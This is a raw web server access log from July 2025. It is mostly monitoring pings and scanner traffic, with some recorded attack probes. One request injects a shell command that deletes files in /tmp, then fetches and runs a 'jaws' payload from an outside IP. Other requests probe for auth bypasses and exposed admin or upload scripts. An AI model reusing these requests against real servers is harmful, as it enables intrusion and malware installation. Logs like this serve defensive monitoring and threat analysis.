212.91.247.32 - - [03/Jul/2025:16:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.135.145.117 - - [03/Jul/2025:16:14:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:16:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:16:15:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.219 - - [03/Jul/2025:16:15:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
170.106.167.214 - - [03/Jul/2025:16:15:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:16:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.130.9.111 - - [03/Jul/2025:16:15:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.82.70.133 - - [03/Jul/2025:16:16:08 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
204.76.203.219 - - [03/Jul/2025:16:16:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.165.69.68 - - [03/Jul/2025:16:19:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:16:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [03/Jul/2025:16:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.219 - - [03/Jul/2025:16:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.166.136.202 - - [03/Jul/2025:16:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.82.70.133 - - [03/Jul/2025:16:23:44 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.234.162.56 - - [03/Jul/2025:16:25:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.234.162.56 - - [03/Jul/2025:16:25:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; SM-G5500; Build/QQ2A.201229.39) AppleWebKit/537.36 (KHTML"
172.234.162.56 - - [03/Jul/2025:16:25:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; SM-G5500; Build/QQ2A.201229.39) AppleWebKit/537.36 (KHTML"
212.91.247.32 - - [03/Jul/2025:16:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.234.162.56 - - [03/Jul/2025:16:25:57 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
172.234.162.56 - - [03/Jul/2025:16:25:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.234.162.56 - - [03/Jul/2025:16:25:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.153.48 - - [03/Jul/2025:16:26:47 +0200] "POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0"
212.91.247.32 - - [03/Jul/2025:16:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:16:26:58 +0200] "POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0"
204.76.203.219 - - [03/Jul/2025:16:27:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [03/Jul/2025:16:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:16:31:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.70.133 - - [03/Jul/2025:16:31:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [03/Jul/2025:16:32:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.123.72.134 - - [03/Jul/2025:16:33:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.206 - - [03/Jul/2025:16:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.166.136.153 - - [03/Jul/2025:16:36:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.121.84.130 - - [03/Jul/2025:16:37:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:16:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.26.80.245 - - [03/Jul/2025:16:38:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.247.32 - - [03/Jul/2025:16:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:16:39:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:16:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:16:39:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.94 - - [03/Jul/2025:16:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.133.14.237 - - [03/Jul/2025:16:43:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:16:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.105 - - [03/Jul/2025:16:44:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
5.62.63.191 - - [03/Jul/2025:16:44:50 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.247.32 - - [03/Jul/2025:16:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.94 - - [03/Jul/2025:16:44:53 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.27.244 - - [03/Jul/2025:16:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:16:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:16:48:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.206 - - [03/Jul/2025:16:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.10.162 - - [03/Jul/2025:16:48:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.137.73.221 - - [03/Jul/2025:16:49:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:16:50:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.61.226 - - [03/Jul/2025:16:52:47 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.61.226 - - [03/Jul/2025:16:52:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.61.226 - - [03/Jul/2025:16:52:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.61.226 - - [03/Jul/2025:16:52:48 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
161.35.61.226 - - [03/Jul/2025:16:52:48 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
161.35.61.226 - - [03/Jul/2025:16:52:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.61.226 - - [03/Jul/2025:16:52:48 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.61.226 - - [03/Jul/2025:16:52:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.61.226 - - [03/Jul/2025:16:52:49 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
161.35.61.226 - - [03/Jul/2025:16:52:49 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.61.226 - - [03/Jul/2025:16:52:49 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.137.73.221 - - [03/Jul/2025:16:52:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.137.73.221 - - [03/Jul/2025:16:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.137.73.221 - - [03/Jul/2025:16:54:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:16:55:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [03/Jul/2025:16:55:44 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.133 - - [03/Jul/2025:16:56:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
93.174.93.12 - - [03/Jul/2025:16:56:07 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
3.130.96.91 - - [03/Jul/2025:16:56:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
no-reverse-dns-configured.com - - [03/Jul/2025:16:56:47 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
93.174.93.12 - - [03/Jul/2025:16:56:47 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [03/Jul/2025:16:56:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Jul/2025:16:56:49 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.77.202 - - [03/Jul/2025:16:56:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Jul/2025:16:56:49 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.130.96.91 - - [03/Jul/2025:16:56:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
93.174.93.12 - - [03/Jul/2025:16:57:03 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
3.137.73.221 - - [03/Jul/2025:16:57:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.137.73.221 - - [03/Jul/2025:16:57:19 +0200] "SSH-2.0-Go" 501 325 "-" "-"
93.174.93.12 - - [03/Jul/2025:16:57:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Jul/2025:16:57:47 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.114 - - [03/Jul/2025:16:57:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.114 - - [03/Jul/2025:16:57:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.114 - - [03/Jul/2025:16:57:57 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.114 - - [03/Jul/2025:16:58:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.114 - - [03/Jul/2025:16:58:02 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.114 - - [03/Jul/2025:16:58:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.142.125.114 - - [03/Jul/2025:16:58:12 +0200] "GET /security.txt HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
93.174.93.12 - - [03/Jul/2025:16:58:20 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:16:58:51 +0200] "POST /api/authentication/login HTTP/1.1" 404 329 "http://212.91.246.88" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:16:58:51 +0200] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
77.90.153.48 - - [03/Jul/2025:16:58:51 +0200] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
3.137.73.221 - - [03/Jul/2025:16:58:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
93.174.93.12 - - [03/Jul/2025:16:58:59 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
77.90.153.48 - - [03/Jul/2025:16:59:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.137.73.221 - - [03/Jul/2025:17:00:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:17:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.137.73.221 - - [03/Jul/2025:17:01:07 +0200] "SSH-2.0-Go" 501 325 "-" "-"
160.30.44.120 - - [03/Jul/2025:17:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.70.133 - - [03/Jul/2025:17:01:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:17:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Jul/2025:17:02:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
no-reverse-dns-configured.com - - [03/Jul/2025:17:02:27 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
80.82.77.202 - - [03/Jul/2025:17:02:27 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.77.202 - - [03/Jul/2025:17:02:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Jul/2025:17:02:27 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
193.138.218.160 - - [03/Jul/2025:17:02:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:17:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.133 - - [03/Jul/2025:17:02:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
no-reverse-dns-configured.com - - [03/Jul/2025:17:03:38 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
80.82.77.202 - - [03/Jul/2025:17:03:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Jul/2025:17:03:38 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.77.202 - - [03/Jul/2025:17:03:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [03/Jul/2025:17:03:38 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:17:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [03/Jul/2025:17:06:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
